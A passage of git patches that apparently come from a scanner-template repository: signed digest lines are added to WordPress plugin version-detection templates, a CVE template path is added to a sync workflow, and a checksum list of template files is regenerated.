part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210098c2e9d7771aafc2d00a0dc18a4660240d6e7c5561276d23a9079d2c2bbac3f6022100ff1f929f1da8bb3d7a3ab06f9ded49f91b2f985606fdabf1fb0b2cf058f2862c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd..e72d887b33 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a9789d86e96e5a1d151fe5c58f1e8417e45e666520c9eef6319b7719531df75a022100e1fd2ccdea72d9986236090d96685c91fafbcf8c6e0dfc3de51daa4609f70504:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08..7fa69eee0d 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022022c7f0a9c85231a6f1338753303accca8ac402c07ccdf08b6cf82568ada732e6022100bbd31da817a3b5f4b018ce558c9dea6fe0e523b8001d02147fab007f187dda5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e9..3b22d57dbd 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100839ccdd6ad735f000b03b478dc31cd59ecddfb1c6a1ead31485cad39c5a4651802210099af6ba7ad32038e766b60387e93ad6953a9bdeb2716f1916d683c6dd2e02eaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf5566..fca822daac 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022062ee72ac9565ee115799a6efbacaa99a4449687ca92912d280bb71179ff39183022100fe31f0688991a0c02af17a8a4e7616ff6ddbfdfa9e5544b11ed44c0a2719fdf2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac7..4cfe930efb 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220660634ea387d8fc7aa8e1d40f37eddb2424e8218e4b6ebbc78f380a26d683586022100ac9bb4a1e4fed2fbf472e25f926262b896e81ac61cbf0488363f4f87893c8037:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df4..f5740a43e8 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b969f12b72732405ded351467b89758afa0b311a50e54280601e76ce4bf416c00221009260d162733f85390a154b09754d6c64489133045ee9a43c5802433447486168:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee046..c69fab8743 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a61f75d5af8c686731bd7723429cad81381bcce9d215ecfe15d70821dbaf2f13022038ccb6aa5c61577ac3502a015d9b8d23acda39e109ea624051f5d566e02d826f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0..a873e39bf6 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205822127b6057a28a121200f62161b83ad999689ad33519c36798965adccbc0dc022100d7774ea0b3200134dd12589853dd55062efcdbd75fd06d40ee3ed42d08ecc982:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff5..22bb52b7ec 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d414972ed3409afe1be0d79db3db167596c1b9c056ab25500739f6808c3ff82002205f10962268f1074b4fce30a9957207ca6acd21000706f7fc7e24e368e7b3b017:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e..2a283d6155 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210098c93a29373629a54b0006f79a36bb071f2234d0aaeeb6591b9ed372eddb658d022100aeaaf2f4307288f2b48211bc34bc508419e917595068611bb7336d12e41efa10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed..e33e6d5dfa 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022034f34e02f3c509438eea3a9662cfa1ebdde0792fca359f96baa21202231f7119022100a6cdebbcbcb2e69bb7d4e9cece06ddfd1bab457942dc80490d59f3f4602c1f53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 58e5e828bf..a3579bace4 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100879bf570242c1cdbdc486be684d444356fc649f4f248be005dca3b43bd1d233c022011a03e6527c0a6f5429fb930c267e8dbc3517e82c0353e5f6bda9d72ea067905:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afeb..01fb1f55e9 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100841a7b4b4cc1a174acaec2f68e7f072f0c786203d522154909a3f5593222068802204c5dee4875c157b4b6d2764076ddbae49a1da73b75bd79b7d07767e8317dd9b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b4..ea5e831a03 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ddf07306ab0b6c12a07ec62b90a7218261f1d3574b12ea49f9ebe7512a3873c4022100b6d68304809545b3da737f73d8e3a3a5f0cecb1d6c04fc358a55b7db16b17e39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda117..e4405facbd 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210092ae257fcb83884c1075cee048d1b6d77c9477f897ca2cad599a7baa8e06e94102206819a31cbb62915ccd7de9376d2b3e053b2d271f41e9e970945520c4fa82ef4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 3c799bd6695400f7269acdebf3ff0e5f025dcc93 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 8 Jul 2024 07:11:42 +0000 Subject: [PATCH 0959/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 88e0cbce73..789039616e 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -20,6 +20,7 @@ on: - 'http/cves/2024/CVE-2024-33610.yaml' - 'http/cves/2024/CVE-2024-34102.yaml' - 'http/cves/2024/CVE-2024-36401.yaml' + - 'http/cves/2024/CVE-2024-36991.yaml' - 'http/cves/2024/CVE-2024-37152.yaml' - 'http/cves/2024/CVE-2024-37881.yaml' - 'http/cves/2024/CVE-2024-4434.yaml' From 390c7f77f0b1fefa78d9780c5b09173c03d12ca5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 8 Jul 2024 07:16:55 +0000 Subject: [PATCH 0961/1841] Auto Generated Templates Checksum [Mon Jul 8 07:16:55 UTC 2024] :robot: --- templates-checksum.txt | 407 +++++++++++++++++++++-------------------- 1 file changed, 204 insertions(+), 203 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 44783eea74..2857ec1703 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3455,7 +3455,7 @@ http/cves/2024/CVE-2024-33113.yaml:f4141a2a8bfa7dfe11f27cd2a19531a90de59223 http/cves/2024/CVE-2024-33288.yaml:021f1910a0468103d59167ac39fc9cf77f246bab http/cves/2024/CVE-2024-33575.yaml:bc3e1dc9d582e0bb3430a33791936484425fb962 http/cves/2024/CVE-2024-33605.yaml:073678cce93693a49cdbf61160717cff11e51f54 -http/cves/2024/CVE-2024-33610.yaml:68e2697350326fac7ae5a4d11c813a586affc694 +http/cves/2024/CVE-2024-33610.yaml:24618eb8295fd20c2eaafe525e895edb63a1c04c http/cves/2024/CVE-2024-33724.yaml:fc5b67f9b84cdf5d6d592f2238c1fb0ef08592cc http/cves/2024/CVE-2024-3400.yaml:446beaf529f998b8b0c5957b75870f5198c21ff2 http/cves/2024/CVE-2024-34102.yaml:2152d70ae35f98d6968fad641af063bdd7b8f83b @@ -3467,6 +3467,7 @@ http/cves/2024/CVE-2024-36401.yaml:9ce37b567a44a508495f69a3ecda745d30a6dcd1 http/cves/2024/CVE-2024-36412.yaml:3dab338da4cd060aacc90a2c21159bf56c95bdff http/cves/2024/CVE-2024-36527.yaml:eb2651a0ee32128fdfe8ae24c72f5d61a1a7f68e http/cves/2024/CVE-2024-36837.yaml:65450880230a57a47c4dbf8b268af022ab009189 +http/cves/2024/CVE-2024-36991.yaml:413e3956938d8c1037408b35793641d623fcbedb http/cves/2024/CVE-2024-37152.yaml:45b7e5ca110853fe4cca80588d33d140f611d1e2 http/cves/2024/CVE-2024-37393.yaml:c7cac02b06ca12c407122ea2fff033456006d7dd http/cves/2024/CVE-2024-37881.yaml:060af3bf51e4ab05684d4923658d02b3c49583bb @@ -5913,7 +5914,7 @@ http/misconfiguration/springboot/springboot-autoconfig.yaml:5ab7cca4905655689b31 http/misconfiguration/springboot/springboot-beans.yaml:3c4b0fbef57ee0101fa37ef4ff146c1b2f3aeebb http/misconfiguration/springboot/springboot-caches.yaml:a14993ca11f0ed7245503a6cacb6f1c7575c2b3d http/misconfiguration/springboot/springboot-conditions.yaml:e213f4eeeed314b4c5516c7564cb1f2c9603c3e8 -http/misconfiguration/springboot/springboot-configprops.yaml:a47393733a4d98af688e20c37b59a28e6c1ddcf1 +http/misconfiguration/springboot/springboot-configprops.yaml:540c4a4ad4b1839c9f91f762670ecd05f9c1a6a5 http/misconfiguration/springboot/springboot-dump.yaml:c55a2d775ad9fcd314c944b54eccf66d9b15e2b0 http/misconfiguration/springboot/springboot-env.yaml:e791c93cd12850fb6b09ef1bb8265e6daae8b249 http/misconfiguration/springboot/springboot-features.yaml:dd0e6d636478dd611bb4a591e5d4deff0879b4bd @@ -7256,228 +7257,228 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 -http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 +http/technologies/wordpress/plugins/ad-inserter.yaml:095952dc79a1199d5d6645d0f4099d05acb18bf0 +http/technologies/wordpress/plugins/add-to-any.yaml:dd430422f3694f3ad32914092d6dfe696fd36f61 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:56193200a5ad8cd79df3e3037f21cb8bac8fb593 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d -http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:26441fd6b1953b3a48bf1ddd7ee4b1355276354a +http/technologies/wordpress/plugins/akismet.yaml:992edc0d8127b134f440ebf2ba45393b0c65ba57 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 -http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 -http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c -http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:8c1fc32baca5c86187c57a744199d2634ad0b9f3 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:3ff2bdfecd2e86131f489f183d000011fca64ee9 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:d796a4f1324e497c66672148dc736570b6c2ed01 +http/technologies/wordpress/plugins/amp.yaml:2a86b04a147f8594606d5640e02be38c58b26c4e +http/technologies/wordpress/plugins/antispam-bee.yaml:32cdcd9f71ca3a81cc2d817d2f70c09dc884e26c +http/technologies/wordpress/plugins/astra-sites.yaml:e5457fbc99ff341af8a4b69a108a7ed34ebfef6d http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 -http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 -http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 -http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 -http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 -http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba -http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff -http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d -http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 -http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 +http/technologies/wordpress/plugins/autoptimize.yaml:5f79ca030a8c54835bdb5bf6b983bb07022844d7 +http/technologies/wordpress/plugins/backwpup.yaml:f541b5791ba0c1b57590c7ef7e5057b3d0316cbb +http/technologies/wordpress/plugins/better-search-replace.yaml:1436911542832367f7a73e245984f855135c68d4 +http/technologies/wordpress/plugins/better-wp-security.yaml:ad57f8e3966912a77ec92a1ac4b50caaae04b1e6 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:ce68b249b0d2d4af0c5305e35310af94d373e6d6 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:3fef102ea4adfcd47c613f38812d941dbfa6532c +http/technologies/wordpress/plugins/breeze.yaml:b6069531c295b9cd31faad6de90481d6e9614ae3 +http/technologies/wordpress/plugins/broken-link-checker.yaml:4bd4efb403201738a6039bcf2bf456d52e408bad +http/technologies/wordpress/plugins/chaty.yaml:16462aebb5a59448c3547f5ada42204af43d55fc +http/technologies/wordpress/plugins/child-theme-configurator.yaml:135d28a035fe2024c27a4291d5cdd5087cb50d42 +http/technologies/wordpress/plugins/classic-editor.yaml:f64dfd58e24cf7d54581292a6c978aa568988830 +http/technologies/wordpress/plugins/classic-widgets.yaml:ebdf488ceda169b199fd20b35a5dfc1d072bf3c7 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:bbdf291f0bbe9fa0b224dd16ebecc7ac0314abf1 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 -http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d -http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c -http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d -http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 -http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 -http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 -http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c -http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 -http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c -http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 -http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 -http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e -http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a +http/technologies/wordpress/plugins/cmb2.yaml:cf1fbc798f953470eaf27078a221cc0d61677279 +http/technologies/wordpress/plugins/coblocks.yaml:0c7406d1cdd3228ca5fa270357ef6c96b8f93e11 +http/technologies/wordpress/plugins/code-snippets.yaml:229cbb5d47f0e9d54a6d74b10286b79c616d45b1 +http/technologies/wordpress/plugins/coming-soon.yaml:2279831b58d568f73472223ed78bc5689ef7201d +http/technologies/wordpress/plugins/complianz-gdpr.yaml:27d03f0c72f295d26678f0fec6ef9c577493cd21 +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:a0df74ca5683ff83e4e5ea01e361b27892ed6eeb +http/technologies/wordpress/plugins/contact-form-7.yaml:7856e4186d462fa9fea31c0524242e2e238ed01d +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:d57271bfeda9d83a23016e3d947bbf336e2daf9b +http/technologies/wordpress/plugins/cookie-law-info.yaml:11dcdc34a6b6ee0f924694552b9596d4d43c825b +http/technologies/wordpress/plugins/cookie-notice.yaml:bfea370ff1f98630b34ef70d4ae003ad30340469 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:c50a6a37ba3bcc194422f2974643fce036b80f44 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:da0a86d63a0448f57d16fe277bc4efa952371d78 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:07f3ddcfe2c909211853aa2f16e356c899bde402 +http/technologies/wordpress/plugins/custom-css-js.yaml:32a327e2a346f776ee967ec8adef5643b841d6d3 +http/technologies/wordpress/plugins/custom-fonts.yaml:49e17f4bac3eaa87e681b02ecd513f9e71e95784 +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:479eca320f1a3234cca3285e5f43d423d4f95e94 +http/technologies/wordpress/plugins/disable-comments.yaml:4de4150fc8e4991cb3b7cf4f46b593a9db3341a0 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:030f49017686ffcecd3410880f231dc1c780a565 +http/technologies/wordpress/plugins/duplicate-page.yaml:555abb3df683cea8d2fd035b5e10b6439e57f5b7 +http/technologies/wordpress/plugins/duplicate-post.yaml:5266c304f148e191841c7322a6d22b21e553b392 +http/technologies/wordpress/plugins/duplicator.yaml:042826206058abb29be4441ff4eb0a3263a644b5 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:4149c7d7d465afc7061ae6e470d066038a662cf5 http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 -http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 -http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 -http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d -http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc -http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 -http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 -http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 -http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e -http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 -http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa -http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 -http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 -http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:ec055e1d70e14dc3e2f9a29a9af8c7c18443fd9a +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:1c536aff0ebc29d842ec9db5f2522cb796446139 +http/technologies/wordpress/plugins/elementor.yaml:7fb07ef5834c225b2d9f15e9be5992a2d5b59793 +http/technologies/wordpress/plugins/elementskit-lite.yaml:09c1fc9632d0125811ba503d62983886e5f676fd +http/technologies/wordpress/plugins/enable-media-replace.yaml:99ac1137e4960c0cf745b85b5461982832765782 +http/technologies/wordpress/plugins/envato-elements.yaml:0c9e809e2af08367305f0acae26f9732af87a15c +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:ab2b451c4e1ad2bd38e5e50684bdd2b78fd9f125 +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:883cce26baa7b722f52b677b36e04f0b856f9c86 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:92641e582ec2a3512f493d21db5f3972240308ec +http/technologies/wordpress/plugins/fast-indexing-api.yaml:ccc1bf6360357d53e3d31e295e6da039da374cb0 +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:503937c37e3ef0f574a1af660c95e78265e43af9 +http/technologies/wordpress/plugins/flamingo.yaml:825beb522216e9450fda6a4479720d84fd734f9f +http/technologies/wordpress/plugins/fluentform.yaml:697d770f09eb6a1344adf4a2b42f4c6cd7c2e45d +http/technologies/wordpress/plugins/font-awesome.yaml:cf09a99883fc47da14c78083630bb970694c2c27 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:71e5ab7ba410e484e474ce542fb230eefde6eeb2 